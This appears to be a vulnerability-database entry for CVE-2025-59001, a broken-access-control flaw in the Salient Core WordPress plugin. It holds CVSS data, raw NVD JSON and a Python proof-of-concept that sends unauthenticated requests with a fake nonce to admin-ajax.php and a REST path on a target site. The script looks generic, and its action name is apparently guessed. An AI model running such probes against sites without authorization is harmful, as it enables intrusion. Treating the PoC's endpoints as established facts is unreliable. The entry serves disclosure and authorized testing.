Security Vulnerability Report
中文
CVE-2025-59001 CVSS 4.3 MEDIUM

CVE-2025-59001

Published: 2025-12-16 09:15:53
Last Modified: 2026-04-27 20:16:24

Description

Missing Authorization vulnerability in ThemeNectar Salient Core salient-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Salient Core: from n/a through <= 3.0.8.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Salient Core Plugin <= 3.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-59001 PoC - Missing Authorization in Salient Core # Target: WordPress site with Salient Core plugin <= 3.0.8 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-59001 This PoC demonstrates unauthorized access to protected endpoints """ # Add your target WordPress site URL base_url = target_url.rstrip('/') # Step 1: Identify the vulnerable endpoint # The plugin exposes admin-ajax.php or custom REST endpoints vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/salient/v1/' ] # Step 2: Attempt to access protected functionality # without proper authentication/authorization headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } # Step 3: Test with low-privilege or no auth # Modify the action parameter based on target for endpoint in vulnerable_endpoints: url = f'{base_url}{endpoint}' # Example: Test unauthorized access to settings data = { 'action': 'nectar_get_core_settings', 'nonce': 'fake_nonce_for_testing' # May not be required due to missing auth check } try: response = requests.post(url, data=data, headers=headers, timeout=10) # If we get a 200 response with sensitive data, vulnerability exists if response.status_code == 200: print(f'[+] Potential vulnerability detected at: {url}') print(f'[+] Response: {response.text[:500]}') return True except requests.exceptions.RequestException as e: print(f'[-] Error testing {url}: {e}') return False if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print('Usage: python poc.py <target_url>') print('Example: python poc.py http://target.com')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59001", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:52.850", "lastModified": "2026-04-27T20:16:23.717", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ThemeNectar Salient Core salient-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Salient Core: from n/a through <= 3.0.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/salient-core/vulnerability/wordpress-salient-core-plugin-3-0-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}